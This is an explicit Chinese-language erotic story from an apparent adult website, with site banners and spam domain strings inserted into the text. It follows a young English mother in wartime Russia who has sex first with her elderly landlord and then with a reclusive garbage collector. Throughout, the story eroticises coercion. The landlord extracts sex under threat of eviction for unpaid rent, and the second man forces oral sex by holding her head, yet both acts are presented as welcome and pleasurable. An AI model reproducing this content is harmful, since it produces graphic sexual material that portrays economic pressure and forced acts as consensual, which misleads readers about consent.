返回

西方少妇淫行687

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

西方少妇淫行

姬蒂莱莉今年十八岁,虽然刚生下了一个女儿,但还是十分青春可爱,一派娇嫩欲滴少女模样!她上年在家乡英国人伦敦偶遇一名俄国青年,二人瞬即恋上,不久姬蒂更有了孕,最后二人私奔!到了青年的故乡莫斯科,但无奈姬蒂丈夫薛达多被征为军医参与第一次世界大战!后来虽然军部每月均有补贴,但实太微薄,姬蒂母女根本不能在莫斯科城中生活,她只好搬往市郊,一个叫尤利的小村庄居住。她们在一幢三层高残旧公寓中租了一个一百呎左右的小房间,环境十分挤迫,二千呎的空间连房东住了五家人,徐了姬蒂其余四家都是年过半百的糟老头,他们对这青春美丽的长发英国少女十分的有兴趣,几乎每天都在言语和行为上骚扰她,更常偷看她洗澡和上篶所!她为了这些事情烦恼不已,但又无可奈可,只好哑忍!

尤其那房东萨巴老伯,他年近八十,又矮又胖又脏,但见到姬蒂时却如惊为天人!常常藉故亲近,吃她豆腐,因为他是房东,姬蒂为没法子只好让他讨些便宜,摸摸乳、屁股,顶多再给他亲一亲!就此而已。但今天却不同了,姬蒂女儿最近常生病,令她两月都没钱交租。早上女儿尚未醒来,萨巴老伯把她叫到他的卧室,他叫姬蒂生在床边,他则坐在她旁边。

姬蒂面有难色:「老伯请再给我一些时间,很快我就有钱给你了!」

萨巴老伯一手已搂住姬蒂的纤腰:「两个月了!莱莉,我也没办法,你要搬走啦!」

姬蒂哀求:「不!我女儿生病,我们不能没地方住的!请你帮帮忙吧!」
萨巴老伯在她脸上亲了一下:「我们没什么关系,我怎帮你呀?除非你是我的情人,那就不同了,你说是吗?」

姬蒂情急:「不,我是有丈夫的!不能做你的情人,如果被我丈夫知道了,怎办?」

但是萨巴老伯已忍不住一手按在这少女的胸脯上:「怕什么?你不说、我不说,谁知道?况且你丈夫都不知道什么时候才回来!莱莉啊!你真的太美了!我这辈子都没见过像你这揦美的女人,你每天穿着这身薄薄的衣裙,把你的美好身段表露无遗,多么的性感啊!我呀!一把年纪了,但你来了之后,我脑海里全是你的身影。我、我真的好爱你啊!求求你!给我吧!」

姬蒂本想推开他,但想想如果萨巴老伯真的把她赶走,那怎办?而且他那么多的赞美词语,她也太久没男人了,竟有些心动!也就不再挣扎了。萨巴老伯见姬蒂不语,又没反抗,知道她是答应了!心里立时高兴若狂,忙解开姬蒂连身裙上身的扭扣,掀起她里面穿的小背心,露出了少女的雪白饱满乳房!萨巴老伯抽了口气,一双肥粗大手,握住了姬蒂双乳,慢慢的揉搓。

萨巴老伯瞧得眼为不转:「噢!天哪!真是上帝的杰作!好美!好美的乳房!
好白、好软,那么的雪白、那么的饱满!太美了!」

姬蒂被他说得十分害羞,丈夫亦没有如此的赞美过她,令姬蒂不禁对这老伯有了好感。

姬蒂红了脸:「唔…谢谢你的赞赏!萨巴老伯,姬蒂其实也没你说的这揦好。」
萨巴老伯像小孩得到梦想的玩具般,揉得姬蒂双乳不断变形:「噢!太好了!
只有比我的赞美更好啊!请问你?莱莉,我能不能赏赏你的乳房?我很想吸啜你那如红宝石般的乳头,我很想亲吻、舔你那软滑的乳房啊!可以吗?」
姬蒂心里怦怦乱跳,她已被萨巴老伯揉搓得动了情:「噢…噢…老伯啊!吻吧!请你吻姬蒂的乳房吧!啊…老伯,姬蒂、姬蒂也想让你吸啜我的乳头啊!」
萨巴老伯欢呼一声,肥厚的双唇在姬蒂的乳房上乱吻。黄澄澄的牙齿轻轻的咬着姬蒂的乳头。姬蒂闭上眼睛:「啊…噢…吻、吻我的乳房吧!请你别停下来啊!噢…噢…啜啊!请你啜姬蒂的乳头啊!请你用力啜啊!啊…啊…」

萨巴老伯又舔又吻的,弄得姬蒂双乳湿淋淋,满是唾沫!他叫:「好香!莱莉你的乳房真的好香啊!噢!天呀!好滑、好软!真嫩!嫩的不像是生过孩子的女人的乳房!极品!我这辈子都没赏过这揦棒的乳房啊!噢!?这、这不是奶汁吗!上帝啊!真、真好喝!唔…好喝、好喝!啊…太棒了!」

姬蒂抱着萨巴老伯的头:「老伯、老伯啊!噢…噢…你又不是婴儿,干嘛要喝我的奶水啊?噢…噢…你、你吸得太用力啦!别、别这样!你喝光了我的奶水,等下我用什么喂我女儿啊?噢…请、请你别喝光了,留一些给她呀!唔…啊…」
萨巴老伯根本不理,拼命的吸、拼命的喝!姬蒂双乳的奶水都要被他吸光了。
奶水被拼命吸啜的感觉,令姬蒂不住的喘着气!俏脸通红!玉手抱得萨巴老伯的头更紧,几乎整个乳房都塞进他嘴里!

萨巴老伯边喝奶的时候,另一只手伸进姬蒂双腿之间,摸在她的阴部上,他立时感觉到她腿间三角地带,一片湿漉漉的!而且她的阴部胀卜卜的,隔着内裤也感觉到那浓密的毛发!令他腹部有如火烧一般,况且他那已数十年也没反应的阳具,现在竟如铁柱般坚硬!萨巴老伯再也忍不住了!把姬蒂按倒在床上,掀起她的长裙,一手撕烂她的内裤,自己长裤也不脱,急忙掏出阳具,立即便压在姬蒂身上,用手扶着阳具对准她的阴道,猛力全插了进去!

姬蒂本在享受着乳房被吸啜的畅快感,忽然间萨巴老伯的粗暴举动,却吓了她一跳!刹那间,一根粗大阳具插入自已的阴道,她丈夫离开已久,她一直未有和男人亲热,突然要承受如此粗壮的阳具抽插,实在让她吃不消,姬蒂高叫:「啊!老伯、老伯啊!请、请你轻一点!喔…喔…我、我很久都没和男人来了…
噢…噢…请你、请你慢一点!请你温柔一点!你要爱惜我啊!啊…啊…」
萨巴老伯阳具插在那如处女般紧,又暖又湿的阴道,令他魂魄像飞上了云端!
他吻着姬蒂的脸:「上帝啊!多谢您让我在这般年纪,还得到这如天使般的女人!

噢!我的宝贝啊!你可真紧呢!紧得有如处女般的,你的丈夫很少和你做爱吗?

嘿…请问你是我的家伙厉害、还是你丈夫的家伙厉害呢?」

姬蒂心里正在惊叹这年过半百的老头,竟比自已年轻的丈夫还要精壮!她心想:「这老伯身上好大的异味!他都不洗澡吗?噢!他真胖!好重、要压死我了!
这床好硬!弄得我背脊好痛!可是、可是为什么,我觉得如此兴奋?唔…好充实!

他塞满了我的阴道,真好!真舒服!他的阳具比我丈夫的还要粗!太好了!
啊!

我是有丈夫的!为什这样的糟老头竟会令我情欲如此高涨?难道我是个淫荡的女人?难道我喜欢别的陌生男人做爱?」

她心中乱想,却听得萨巴老伯如此说话,姬蒂不好意思,拍打他的肩膀:「你、你真是个坏老伯!已经在偷奸着别人的妻子,还、还说这种话来伤害他!
噢…噢…啊…姬蒂丈夫也不错,只、只是你太厉害了、他也没你这般、粗、粗壮罢了。噢…天啊!你、你这老伯怎会这样厉害!喔…喔…我快要吃不消了、请你轻一点、慢一点吧!啊…啊…」

萨巴老伯看着跨下的年轻美女媚眼半眯、娇美艳丽!此时她朱唇半张、轻声呻吟!感觉自已如回到年轻时代,力量无比澎湃汹涌!他全力冲刺一会,便把姬蒂半拉半抱起来,让她上半身趴在圆木餐桌上,双腿站在地上,丰臀高高跷起!
这诱惑无比的姿势,淫荡性感之极!萨巴老伯的粗手爱抚着美白的肥臀,目瞪口呆,连连惊叹!

姬蒂被他瞧得羞愧不已:「啊!老、老伯!别再看了!请你、请你快进来吧!
请你快进入姬蒂的身体!」

萨巴老伯也是急不及待,抓住丰臀,挺进那美妙的少女阴道,在这体位的帮助下,萨巴老伯插得更深入了,他那巨大的龟头每一下都重重的撞击在姬蒂的子宫上!粗壮的阴茎把她穴里的爱液全挤了出来,像一条小水流沿着一双玉腿,滴落在木地板上。那冲击力撞得姬蒂晕头转向,几乎立足不稳!她双手抓住木桌,震得四条木脚格格作粛,她本想放声呻吟,尽情呼叫。却怕被其他住客听见,只好咬着自已的幼白玉指,苦苦忍受!她娇喘轻吟:「老伯啊!老伯、我不成了、噢……噢……我、我要死了、喔……喔……不成、真的不成了!」

萨巴老伯嘿了一声:「我的情人啊!别再老伯、老伯的叫了,来、叫我丈夫吧!请你叫我亲亲好丈夫,可以吗?」

姬蒂难为情:「噢!不成的!老伯、姬蒂已有丈夫,现在我已被你污辱了,不能再对不起他,请你、请你原谅吧!」

萨巴老伯哼声:「啊!是吗?那算了!既然你不肯做我的妻子,那我也不能和你作爱了!」

说完萨巴老伯把阳具拔出了一大半,只能下龟头在穴里转动!瞬间的空虚感,像把姬蒂的心脏也抽了出来!

她哀叫:「喔!别、别这样!请你、请你别离开我的身体!你、你原谅姬蒂吧!我、我叫了,我的好丈夫!我的亲亲好丈夫!请你快进来吧!噢!我的心肝丈夫!请和你的妻子做爱吧!」

萨巴老伯哈哈大笑,重新插了进去,不停在那娇嫩阴道进进出出,他弯下身来,胸膛贴在姬蒂的背上,嘴巴在她的耳边:「我的淫荡妻子啊!早知你是如此,一开始便该睡了你!让你早点快乐、满足!我的爱妻啊!丈夫已后必定不再让你寂寞、让你空虚,令你天天都知道做女人的快乐和美妙!」

姬蒂被他压的喘不过气来,身后还要承受那要命的冲击,她轻咬下唇:「啊……请你、请你别这样说我吧!我、我不是这样的、噢……是你、是你让我变成如此、如此、噢……噢……怎会这揦、舒服的!天啊!我喜欢做女人、做女人真好、真美妙!太快乐啦!喔……喔……」

萨巴老伯毕竟年事已高,一轮剧烈运动,不禁气喘如牛,但又曾未完事,只好暂停下来,坐在床上:「对不起,我的爱妻!丈夫实在有点累,请让我休息一会吧!请等一下!很快我就可以再让你快乐。」

姬蒂正乐不可支,忽然停了下来,心中虽万分不愿,但见萨巴老伯气喘吁吁、力尽筋疲,也实在不忍,便走了过去,在他脸上亲吻:「不要紧的,亲爱的丈夫!
你如此努力的让妻子快乐,我还要谢谢你呢!噢!我的心肝丈夫,看你汗流满面,真是辛苦你了!唔、我替你抹掉吧。噢!可怜啊!我真不该呢!只顾自己快乐,你年纪这么大了,还要你如此劳累,真不好意思呢!」

姬蒂一双玉手,轻抹掉萨巴老伯一张丑陋油脸上的汗上,还替他整理头发,更在他额上、脸上怜惜的亲吻着!令他心里无限的甜蜜!本来他只想得到这美丽少女的身体,但她竟是这般善良温柔!他此时已如新婚妻子般爱上了她,萨巴老伯双手绕住姬蒂的纤腰,把她搂抱在身上,伸出了肥厚的舌头,在她的耳垂、粉颈上,来回的舔吻着!

萨巴老伯痴迷般:「我爱你!我真的好爱你呢!我美丽的妻子啊!你是的生命!你是我的天使!我已不能失去你!天啊!你就是我的一切!」

姬蒂甜甜的笑着,玉手轻抚他肥胖的项背,吻着他花白的发丝:「我也爱你!
我的亲亲好丈夫!你真的让妻子好快乐呢!谢谢你啊!妻子现在觉得新丈夫好帅、好威风啊!你真是了不起呢!我的心肝宝贝!」

二人相视而笑,萨巴老伯掠开她额前金黄色的秀发:「我的爱妻啊!丈夫休息够了,来吧、继续吧!丈夫等不及要进入小妻子的身体里了!」

姬蒂亲亲他的鼻尖:「我的好丈夫真棒!这么快就回覆体力了,妻子好高兴呢!但别再累坏了,妻子会很心痛呢!嘻、这样吧,让妻子坐在丈夫身上,那妻子也可出一半的力,别再让我的心肝丈夫太劳累!又能令大家也一起快乐呢!怎样?妻子的想法好不好啊?亲亲丈夫!」

萨巴老伯把她紧紧搂在怀里:「当然好啊!宝贝爱妻!你真好呢!真是体贴!
丈夫爱死你了!小天使!那还等什么?快坐上来啊!丈夫随时准备好啦!」
萨巴老伯引令着她慢慢跨坐在自已身上,姬蒂也扶住他的阳具轻轻的送进自已的身体!萨巴老伯抱着这幼嫩欲滴、雪白无瑕、香气扑鼻的娇躯,瞧着那天真美艳的脸容!真的魂销魄散、神魂颠倒!姬蒂贴着他的脸半张朱唇,娇呼呻吟、呵气如兰!萨巴老伯忙大嘴一张,封住了她的香唇!

本来萨巴老伯黄澄澄的牙齿,恶臭非常的口气,实在让人恶心之极!但此刻姬蒂竟有如吃着糖果的小孩,细细品尝他的肥舌!他们二人深情热吻,舌头纠缠绕动,互相吞吐唾液!姬蒂娇躯在他的撞击中,上下摆动,一双丰满雪白美乳,不住左右晃来荡去!煞是好看!

萨巴老伯放开了口,用力含着发硬了的乳头,并用粗大的舌头在姬蒂的乳晕上灵活地来回打圈。

姬蒂娇呼不已:「丈夫、我的好丈夫啊!妻子、妻子受不了!噢……噢……不成了、妻子不成了啊!喔……喔……太快活了!」

姬蒂真真正正感受到性高潮,到达了高潮的她,阴精泄出烫在萨巴老伯的龟头上!

他大叫:「呀!丈夫、丈夫也不行了!妻子啊!丈夫的精液全给你啦!」
阴茎这时竟像又涨大了,姬蒂感无比的舒适和快感!她满足呼叫:「给我吧!
请丈夫把精液,射在妻子的子宫里啊!噢……这、这么多!好烫啊!噢……
妻子的子宫要溶化了!」

萨巴老伯累积多年精华,全射进了姬蒂体内,而且数量惊人!竟射半分钟之久!萨巴老伯和姬蒂二人同深深呼了口气,双软倒在床上,姬蒂伏在他身上,头埋他的颈项间,娇吁连连!

萨巴老伯粗轻扫她的玉背,叹口气:「天啊!刚才的做爱真美妙!对吗?我的爱妻!」

姬蒂点点头:「对呢!太美妙、太精采了!请让我再次谢谢你!谢谢你让我知道做女人是多么的快乐、多么的幸福!唉!我丈夫离开太久了,我也需要男人的慰藉!你是那么的健壮,所以我也愿意当你的情人、情妇!在只有我俩时,你才可叫我宝贝、叫我妻子,我也会叫你心肝、叫你丈夫!但若有旁人在,我就叫回你做房东和萨巴老伯,你也要叫我莱莉小姐啊!好么?」

萨巴老伯轻揉她的丰满美乳:「当然!这很合理!爱妻请让我再吻吻你吧!」
姬蒂甜美一笑,送上香唇,二人又再亲吻。好一会,姬蒂推一推他:「丈夫啊!对不起呢!我女儿快要醒来,请让我回去吧!」

萨巴老伯依依不舍、万不情愿:「啊!要走啦?真舍不得我的爱妻啊!我会很想念你呢!」

姬蒂呵呵娇笑,敲一下他的额头:「傻瓜!我就住在旁边,想念什么?别这样呀!将来要亲热的时间可多着呢!嘻、讨厌!别摸啦!亲亲丈夫请让妻子穿上衣服吧!哎哟…好啦!好啦!就让你再啜一会乳头吧!唔…真是的!像小孩一样!
好讨厌!够了没有?如果你喜欢,我以后喂完女儿,再来喂你吧!」

萨巴老伯老大不愿吐出口中乳头:「真的吗?你可不准骗我!那我以后不喝牛奶,只喝你的奶啊!」

姬蒂瞟了他一眼,没好气:「随便你啊!就怕我的奶水不够你喝!哎呀!还抱着我干什么!缠死人了!」

萨巴老伯嘻皮笑脸:「妻子啊!丈夫太久没吃奶了!你就让我再吸啜多一会吧!一阵子就好,求求你!」

姬蒂全没办法,也见他可怜:「唉!怕了你啦!快吃吧!真气人!唔…嘻、讨厌!别弄怪声啦!哎哟!怎么舔到乳沟里去了?嘻、嘻、痒死了!别胡闹!别乱舔!啜乳头啦!再乱来不让你吃啊!」

萨巴老伯也笑:「不关我的事啊!谁叫妻子这双乳房如此美、如此香软!当然要整个舔啊!」

姬蒂吃吃嘺笑:「你还要这样!嘻…嘻、哎哟!好了吧?两个都舔过了啦!
来,乖乖的,放口吧!噢!你看!湿答答的,恶心死了!衣服给我啦!」
萨巴老伯眯着眼睛:「妻子!妻子呀!好妻子啊!我的宝贝妻子!」

姬蒂抹好身体,穿上衣服:「哎呀!烦死啦!好丈夫、别这样!我也舍不得离开你!这样吧!今晚我哄过女儿,就过来陪你睡好么?」

萨巴老伯高兴:「好啊!不过是我过来好么?我想睡在你香喷喷、暖烘烘的床上!」

姬蒂红了脸:「讨厌!坏主意真多!好吧!晚上我把油灯熄了,你就过来吧!可要小心点别给人看见了!」

萨巴老伯又亲又吻、搂搂抱抱,纠缠了好一会,才肯放走姬蒂!

晚上,姬蒂也心痒难奈,比平时早熄了灯!才一会便有人轻敲房门,她甜甜一笑,慢慢开启,果然是萨巴老伯,他闪身而入!

他一手搂住姬蒂:「妻子啊!心急死我了!快,亲一亲!」

姬蒂香唇被封:「噢!唔…等、等下啦!急什么啊!等下让你亲个饱!刚刚没让人看见吧?」

萨巴老伯心急如焚:「没有、当然没有!他们早睡了!快点嘛!」

姬蒂见他样子好笑:「嘻、你真是的!急色死了!小心别吵醒我女儿!来,吻我吧!臭嘴巴!」

二人激烈拥吻,直倒在床上!萨巴老伯年纪已大,一早剧烈运动过,所以这次只是??了事!姬蒂今早已满足得很,对他现在表现也毫不介意。

她依偎在萨巴老伯胸膛上:「怎样?满意了吗?我的好丈夫!」

萨巴老伯神元气足:「够啦!够啦!我的好妻子,太舒服啦!你的床铺真香、真软!舒服极了!」

姬蒂笑盈满脸:「丈夫舒服就好!妻子好高兴啊!累坏了吧!来,搂着妻子睡吧!」

萨巴老伯搂住柔若无骨的娇躯,嗅着那少女的淡淡幽香,感觉如神仙一般!
他忽然钻进被窝里:「爱妻啊!请让丈夫含着你的乳头来睡!我要嗅着你的乳香睡觉!」

姬蒂娇躯乱颤:「你有完没完啊!嘻、嘻…你不是说含着的吗?怎么又啜了?噢!你这样子妻子怎睡啊!呵…呵…真讨厌!别玩啦!好痒!」

萨巴老伯啜啜舔舔,弄得姬蒂喘吁抖颤!她觉得这老伯情趣十足,床第之事十分擅长!她几乎当他是真正的丈夫了!

姬蒂捧住他的头:「哎哟!玩够了!好丈夫,你真好!妻子觉得好幸福啊!得到你的疼爱!来,好宝宝!含着妻子的乳头睡吧!唔…好舒服呢!这感觉真美!噢…又啜了么!好吧!随便亲亲丈夫,噢…别只啜一边嘛!另一边也要啜的啦!不然会好难受!对、对啦!就这样!唔…丈夫好会啜奶!真舒服!噢!太好了!这样子睡觉真好!」

萨巴老伯啜着一边乳头,手就揉另一边的!弄得姬蒂浑身舒畅,渐渐睡去!
他自已也真的含住乳头来睡着了!

第二天姬蒂一早醒来,萨巴老伯已不身旁,她笑了笑便起来。忽然记起今天要到莫斯科的军部,办些手续,忙把女儿托给一名相熟大婶照顾,就立即上路,原本她预计中午可回,但手续比想像中繁复。弄至傍晚才可离去,但不料走到一片森林时,便迷了路!姬蒂心中害怕,来回走着时,竟发现远处有一微弱灯光,忙急步走近,原来是一间细小木屋,姬蒂认得那是在村庄里倒垃圾的老汉驼子扎卡的屋子!虽然已近村庄,但夜幕深沉,她怕又迷路,更见得屋旁有一架骡车,心想可不可以叫载回村庄,便上前敲门!

大门滋滋打开,一个丑陋无比的干瘦驼子走了出来,他一动不动的,呆呆的看着姬蒂!

她先开口:「你好!你就是扎卡、叔叔吧!我叫姬蒂莱莉,是住在尤利村的,因为迷了路,所以来打扰你啦!对不起!」

扎卡回过神来,请姬蒂走进屋内,屋内十分简陋,一张矮木卓,一堆干禾秆草床,一个马桶,几个罐子!垃圾和排泄物的臭味,几乎令人窒息!姬蒂本想请他送自已回村,但见他正在用餐,大概是刚工作完了,就不便开口,只好借宿一晚,明早才回去。她睡在干草床上,直到半夜,忽觉臀部一阵异样,张开眼睛,原来扎卡在偷摸她!扎卡见她醒来,忙连声道歉!

他惊谎:「对、对不起!我、我从没和女人如此亲近,还像天使般美丽的!所以一时忍不住,真对不起!」

姬蒂见他无意也不生气,听他说从没和女人亲近过,便觉可怜!更在明亮的月色下,看见他裤裆中撑起老高,不禁心头狂跳!她招手唤他过来。

她微笑:「不要紧!我不生气!你从没碰过女人?你今年多大年纪啦?」
扎卡低下头:「下星期就六十了!所有人见我如怪物,怎可能有女人会让我碰!」

姬蒂想他六十岁的年纪,女人也没碰过,如此可悲!实是同情!

她柔声:「啊!太可怜了!那可不一定呢!你想不想、亲近我啊?」

扎卡不可置信:「不可能的!莱莉小姐美如天使,怎会让我碰呢?别开我玩笑了!」

姬蒂叹口气:「算了,这也是我俩的缘分,就让你讨个便宜吧!」

她说着便解开上衣,露出一双饱满雪白的乳房,扎卡瞧得呆若木鸡、不知所措!

姬蒂挨近:「傻瓜!只是瞧着就够了吗?要不要尝一尝?来,含着呀!唔…噢…笨蛋!干嘛含着不动?唉!啜嘛!吸啜呀!像吃奶那样!哦…哦…对了!就是这样!哦…哦…用力点啜!舌头撩拨一下乳尖,噢…噢…扎卡叔叔好聪明!学的好快!你也幸运,今天我没喂过女儿,存了很多奶水,现在全让你喝了吧!噢!好喝吧!,啊…啊…好舒服!来,另一边也要啜啦!啊…啊…扎卡叔叔、扎卡叔叔啊!」

姬蒂心想:「噢!真棒!他从没碰过女人,竟一学就会!真是太棒了!原来我这么爱让男人吸啜乳房!他和亲亲丈夫都这么会吃奶,如果让他们一起吸啜我的乳头,不知会是什么感觉?啊!太下流了!我怎会这么下流!」

这时扎卡忽然吐出乳头:「莱莉小姐,请问你我能不能舔、能不能吻你整个乳房啊?」

姬蒂点头:「当然可以呀!只要不弄痛我,可随你怎样玩呢!你别叫我莱莉小姐啦!叫我、叫我情人,叫我情人妹妹吧!」

扎卡高兴不已:「真的嘛!真的嘛!你肯当我的情人!?」

姬蒂媚眼一瞟:「是呀!不是情人,谁肯跟你做这种事?是情人才会让他吸啜乳房呀!那我能不能叫你哥哥、情人哥哥?」

扎卡哈哈大笑:「当然可以!妹妹、情人好妹妹!」

姬蒂俏脸一红:「哥哥、情人好哥哥!情人哥哥你不是要舔妹妹的乳房嘛?
快呀!妹妹好想让你舔!」

扎卡叫:「对啊!情人妹妹哥哥不客气了!哥哥要好好品尝你的香乳了!」
扎卡大口一张,在两个大乳房上又舐又舔!每一吋的奶肉上都是他的唾液!
姬蒂轻呼:「哦……哦……好舒服!喔……喔……好棒啊!嘻、嘻!情人哥哥中间的乳沟就别舔了!妹妹好痒啊!呵……呵……叫你别舔啦!你真顽皮!哎哟、情人哥哥,太痒了!哈……哈……妹妹、妹妹受不了!」

扎卡玩的不亦乐乎,一条肥厚大舌,像狗一般,不停舐在姬蒂的乳沟上,她娇躯乱颤,大声嬉笑!

姬蒂笑不可抑:「嘻……嘻……嘻……嘻……情人、情人哥哥!你太顽皮啦!弄得妹妹痒的要死!嘻……嘻……好啦!好啦!别舔啦!情人哥哥,妹妹跟你玩别的啦!好不好?」

扎卡还捧着双乳:「还有什么可以玩?情人妹妹,哥哥还会想舔啊!」
姬蒂推开他的头:「好了!妹妹真的受不了!来,情人哥哥,妹妹教你玩别的。情人哥哥先把你的阳具拿出来,对!拿出来啊!噢!天啊!你的家伙真不得了!」

扎卡掏出他的阳具,他的阳具除了粗长无比外,在那如圆球般的巨大龟头上,还长了一角角的肉稜,就跟他的外表一样,像个怪物!

姬蒂吓一跳:「等下、等下,情人哥哥要慢慢的放进来啊!妹妹不知道受不受得了!?让我先躺好…来,情人哥哥伏在妹妹身上啊!是这样了,阳具对着妹妹腿间的洞插进去…噢!不是这个啦!是下面的那个!对了!插进去啦!啊…这么大的龟头!噢…这么粗、这么长的阴茎!再慢点!妹妹的阴道会破的!天啊!为何我会遇到这种男人的!?」

扎卡在那紧紧的阴道中抽插着,感到前所未有的舒畅!

他问:「情人妹妹,我们这样子是不是叫做性交(淫色淫色4567Q.c0m)?哥哥是不是在和你做爱?」
姬蒂被他问得一脸通红:「是呀!情人哥哥在和妹妹做爱!我们这样子就是性交(淫色淫色4567Q.c0m)!」

扎卡喜不自胜:「我终于能和女人做爱了!还是这样漂亮美丽的!情人妹妹,哥哥真喜欢和你做爱!我爱你啊!情人妹妹!」

姬蒂甜蜜的笑:「我也爱你,情人哥哥!妹妹也很喜欢和你做爱呢!噢!呀…情人哥哥的肉稜磨得妹妹肉壁好舒服!啊…啊…好棒!撞在妹妹子宫上了!太爽快啦!哦……哦……」

扎卡笨拙的低下头:「情人妹妹,哥哥能不能一边插你,一边亲你的嘴!」
姬蒂伸过头去:「好啊!妹妹也很想和情人哥哥接吻!」

扎卡吸啜她的香唇,肥舌在小嘴里翻来覆去,和小香舌纠缠着!

姬蒂心想:「天啊!他好会接吻!虽然口气是太臭了!但他的舌头像蛇一样灵活,好美妙!啊…他抽插得快了、用力了!噢…噢…不、不行!穴都麻了!舒服极啦!他好会插,我要被他插死了!噢!上帝啊!高潮、我要高潮了!哦……哦……」

姬蒂快感如潮,身躯一抖,阴道紧箍,阴精便泄!扎卡被紧紧夹住,阴精烫在龟头上,便忍不住也要射精!

他惊呼:「我怎搞的?这时候竟想撒尿!呀!对不起!情人妹妹,哥哥来不及拔出来!要、要尿在你里面了!」

但那六十年的份量,为不是说笑的!扎卡射了一会,竟还未停下,他忍不住拔了出来,但精液仍有如喷泉般汹涌而出!

他吃惊:「这、这粘糊糊的白色浆液是什么!情人妹妹,哥哥怎会这样的?」
姬蒂翻起身来:「情人哥哥别怕啦!妹妹来弄!」

她头一低,香唇半张,便含住了那大龟头,把那源源不绝的精液全喝下去,但竟似流量不断!姬蒂咕噜咕噜大口喝下了差不多半茶杯的份量,才停了下来!
扎卡吁了口气:「终于没有了!情人妹妹全喝下去了吗?很好喝的吗?原来情人妹妹喜欢喝这些东西!以后哥哥常常给你喝!」

姬蒂不去理他,将马眼凹位里的精液,都细细的吸啜出来,然后索性把阴茎上的爱液和精水,全舔个干净!她整理完后,跪在扎卡身前,抹一抹嘴,咳了几下!

她白了扎卡一眼:「要不是怕情人哥哥数十年的精华浪费掉,妹妹才不会喝呢!又腥又臭,难喝死了!而且还多成这样!喝的妹妹肚子也涨了!」

扎卡把姬蒂搂抱怀中,轻抚她的肥皮:「对不起!情人妹妹,真是辛苦你了!哥哥知道了,这是精液对不对?那哥哥刚才射在你的穴里,这岂不是会有孩子吗?」
姬蒂羞愧不已:「才不行啊!妹妹才不要替你生孩子!」

扎卡紧抱着她,在她脸上乱吻:「别这样啦!好妹妹、情人好妹妹!替哥哥生个孩子嘛!男的、女的都可以啊!」

姬蒂嘻嘻笑,推开了他:「神经病啊你!来,妹妹好累了!抱着妹妹睡觉好么?」

就这二人相拥着,睡在干草床上!

翌日一早,姬蒂还睡得正香,突然觉得胸前一阵骚痒!她美目半张,原来扎卡一早便在吸啜着乳头!

姬蒂甜甜一笑,轻抚他的头:「好讨厌的情人哥哥!一早就啜妹妹的乳头,让妹妹睡多会都不行么!」

扎卡含着乳头:「哥哥要喝奶嘛!情人妹妹好多的奶水啊!好好喝!」
姬蒂抱着他的头:「噢!情人哥哥原来喜欢喝妹妹的奶水!那就尽情喝吧!
妹妹的奶水全给你喝!噢!别急嘛!又没人跟你抢!慢慢的啜嘛!一边喝完了,还有另一边!不用急!妹妹随便你喝!」

扎卡尽情吸啜,喝了个饱,把两边乳房的奶水都喝个干净!

扎卡抬起头:「喝完啦!真好喝!多谢情人妹妹的奶水啊!哥哥喝的好饱啊!」
姬蒂亲吻他的脸:「不用谢呀!情人哥哥也吸啜得妹妹很舒服,奶水给你喝,妹妹也很高兴!可是妹妹一早就喂奶给情人哥哥喝,还没吃过早餐呢,现在请让我穿上衣服,吃些东西吧!」

姬蒂穿好衣裙,扎卡送上茶和面包,她吃着早餐,扎卡坐在旁边伸出大手又再揉她丰满双乳,姬蒂没力挣扎,他便索性把娇躯抱在怀中,肆无忌惮的玩弄起来,姬蒂也没好气,只好边吃边任他淫辱!

吃完便叫他用骡车载她回去。车上扎卡又再毛手毛脚,姬蒂想想他也寂寞,便随他玩弄!但一会扎卡又想解她衣衫,姬蒂怕被人看见,推开了他!

扎卡哀求:「情人妹妹,哥哥太爱你了!又不知什么时才可再亲近你!我只要再吮吮乳头就好!这条路根本没什么人走,何况一大早!来嘛,求求你!」
姬蒂心中一软:「你真讨厌!像小孩子一样!好啦、好啦!来,快吮!趁路还有段路程,就让你再玩玩吧!噢…噢!吮、吮得这么用力!哦…哦…真要命!
哎哟!顽皮鬼别咬啦!哎哟!痛死妹妹了!嘻…嘻…情人哥哥太顽皮啦!又舔乳沟!唔…好棒!乳房好舒服!噢…情人哥哥!」

扎卡忽然吐出乳口:「情人妹妹啊!哥哥的阳具现在又变大了,涨的很辛苦啊!情人妹妹,我们再来性交(淫色淫色4567Q.c0m)、再来做爱吧!好不好?」

姬蒂不依:「昨晚情人哥哥插得妹妹死去活来,一早再来,妹妹会受不了的!这样吧!妹妹替你揉揉它,好吗?」

姬蒂玉手摸在那粗黑的阳具上,慢慢的上下套弄,香唇主动和扎卡吻上。他也一手按在姬蒂的阴部上,就这样二人在骡车上边热吻边爱抚对方性器!

扎卡吻着香唇:「噢!情人妹妹,不行呢!哥哥还是涨的很难受!不如你给我含一含吧!昨夜你也含得我很舒服!」

姬蒂本不想一早便口交,况且在山道上被人看见可不得了,但扎卡已把她抱起走入路旁密林中,在一块大石上放下姬蒂,掏出乌黑黑的阳具,伸到她的面前,姬蒂俏脸一红,别过头去,扎卡半强迫按下她的头,她知道不满足他,便不能作罢,就叹了口气,小嘴一张,把如怪物般的龟头含入嘴里!姬蒂用力吸啜,小舌在龟头上灵活打圈,舌尖撩拨马眼凹位,再在阴茎上细细舐舔,像是十分滋味,连阴囊也吮舐过!扎卡半反白眼,唔唔轻呼!舒服得灵魂飞上了半空!他手按着姬蒂的头,下身开始挺动,慢慢把她的小嘴当是阴道来抽插,扎卡越插越深,直入喉头,弄得姬蒂几乎喘不过气来,心中叫苦!

良久,扎卡大叫一声,猛然挺进,精液如潮狂喷!姬蒂头被按紧,龟头直入,热烫烫的全涌入喉咙!等扎卡泄了干净,重重吁口气!姬蒂才呛了几下,抬起头来!

姬蒂难他的腿:「好讨厌!想弄死妹妹啊!老是强迫妹妹喝这些东西!」
扎卡抱她入怀,在俏脸上乱亲乱吻,姬蒂笑着把他推开:「好啦,别玩了!
妹妹要回去呀!嘻、又要亲嘴、讨厌、唔…烦死了,亲吧、亲吧!让你吻个够!」

扎卡边半拉半起抱起姬蒂,边深情热吻着!二人跌跌撞撞,爬上骡车,直吻到近村口外才分开!

2。

这天黄昏,姫蒂独自在公寓后的井边打水洗衣服,忽然有人从后搂住了她,姫蒂吓了一跳,转头望去,原来是萨巴老伯!

姫蒂笑骂:「讨厌啦!坏丈夫,想吓死我吗!别玩啦!妻子要洗衣服!」
萨巴老伯下身贴紧她的丰臀,双手上移轻轻的揉玩那对硕大的美乳!

